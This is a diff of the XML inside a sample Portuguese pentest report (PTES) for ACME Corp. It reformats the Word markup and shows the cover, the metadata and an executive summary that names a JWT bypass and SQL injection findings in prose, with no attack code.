--- a/docs/sample-reports/suricatoos-relatorio-ptes.docx
+++ b/docs/sample-reports/suricatoos-relatorio-ptes.docx
@@ -1,10 +1,58 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:before="600"/>
+        <w:spacing w:before="600"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA0E6E7" wp14:editId="1DC6E76A">
+            <wp:extent cx="685800" cy="685800"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="685800" cy="685800"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14,12 +62,12 @@
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
-        <w:t xml:space="preserve">SURICATOOS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="60" w:before="200"/>
+        <w:t>SURICATOOS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="200" w:after="60"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -29,7 +77,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">RELATÓRIO DE PENTEST · PTES</w:t>
+        <w:t>RELATÓRIO DE PENTEST · PTES</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -44,7 +92,7 @@
           <w:sz w:val="48"/>
           <w:szCs w:val="48"/>
         </w:rPr>
-        <w:t xml:space="preserve">Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
+        <w:t>Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -57,35 +105,46 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Preparado por Suricatoos para</w:t>
+        <w:t>Preparado por Suricatoos para</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="50%"/>
+        <w:tblW w:w="2500" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="682"/>
+        <w:gridCol w:w="4191"/>
       </w:tblGrid>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="14%"/>
-            <w:shd w:fill="FF7678" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="80"/>
-              <w:left w:type="dxa" w:w="80"/>
-              <w:bottom w:type="dxa" w:w="80"/>
-              <w:right w:type="dxa" w:w="80"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="700" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FF7678"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:left w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:right w:w="80" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -100,17 +159,18 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t xml:space="preserve">AC</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
+              <w:t>AC</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
             <w:tcBorders>
-              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
+              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
             </w:tcBorders>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -131,7 +191,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="300" w:before="120"/>
+        <w:spacing w:before="120" w:after="300"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -146,29 +206,40 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="100%"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="E2E8F0" w:sz="4"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
+          <w:insideV w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
         </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="100"/>
-        <w:gridCol w:w="100"/>
+        <w:gridCol w:w="2534"/>
+        <w:gridCol w:w="7212"/>
       </w:tblGrid>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="26%"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1300" w:type="pct"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -180,17 +251,18 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Período</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+              <w:t>Período</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -200,20 +272,26 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">02/06/2026 – 06/06/2026</w:t>
+              <w:t>02/06/2026 – 06/06/2026</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="26%"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1300" w:type="pct"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -225,17 +303,18 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Versão</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+              <w:t>Versão</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -245,20 +324,26 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">1.0</w:t>
+              <w:t>1.0</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="26%"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1300" w:type="pct"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -270,17 +355,18 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Autor</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+              <w:t>Autor</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -290,20 +376,26 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Equipe Red Team — Suricatoos</w:t>
+              <w:t>Equipe Red Team — Suricatoos</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="26%"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1300" w:type="pct"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -315,17 +407,18 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Contato</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+              <w:t>Contato</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -335,20 +428,26 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">redteam@suricatoos.example</w:t>
+              <w:t>redteam@suricatoos.example</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="26%"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1300" w:type="pct"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -360,17 +459,18 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Risco geral</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+              <w:t>Risco geral</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -380,20 +480,26 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">82/100 (CRÍTICO)</w:t>
+              <w:t>82/100 (CRÍTICO)</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="26%"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1300" w:type="pct"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -405,17 +511,18 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">Metodologia</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="60"/>
-              <w:left w:type="dxa" w:w="40"/>
-              <w:bottom w:type="dxa" w:w="60"/>
-              <w:right w:type="dxa" w:w="40"/>
+              <w:t>Metodologia</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:left w:w="40" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:right w:w="40" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -425,7 +532,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">PTES — Penetration Testing Execution Standard</w:t>
+              <w:t>PTES — Penetration Testing Execution Standard</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -438,7 +545,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -448,13 +555,14 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 1</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>SEÇÃO 1</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -466,7 +574,7 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sumário Executivo</w:t>
+        <w:t>Sumário Executivo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -480,7 +588,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">A Suricatoos conduziu uma avaliação ofensiva autônoma, orientada pela metodologia PTES, contra a superfície web e a infraestrutura Active Directory autorizadas da ACME Corp.</w:t>
+        <w:t>A Suricatoos conduziu uma avaliação ofensiva autônoma, orientada pela metodologia PTES, contra a superfície web e a infraestrutura Active Directory autorizadas da ACME Corp.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -494,7 +602,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">O engajamento identificou uma postura de risco ALTA: foi possível encadear vulnerabilidades de aplicação até o comprometimento de uma conta privilegiada do domínio de teste, demonstrando um caminho plausível para exposição de toda a base de clientes e controle administrativo do ambiente.</w:t>
+        <w:t>O engajamento identificou uma postura de risco ALTA: foi possível encadear vulnerabilidades de aplicação até o comprometimento de uma conta privilegiada do domínio de teste, demonstrando um caminho plausível para exposição de toda a base de clientes e controle administrativo do ambiente.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -508,46 +616,61 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Os achados mais graves — bypass de autenticação por JWT inseguro e injeção de SQL — são exploráveis remotamente, sem autenticação prévia, e devem ser tratados de forma imediata. A seção de recomendações apresenta um roteiro de remediação priorizado por risco de negócio.</w:t>
+        <w:t>Os achados mais graves — bypass de autenticação por JWT inseguro e injeção de SQL — são exploráveis remotamente, sem autenticação prévia, e devem ser tratados de forma imediata. A seção de recomendações apresenta um roteiro de remediação priorizado por risco de negócio.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:type="pct" w:w="100%"/>
+        <w:tblW w:w="5000" w:type="pct"/>
         <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
+          <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
+          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
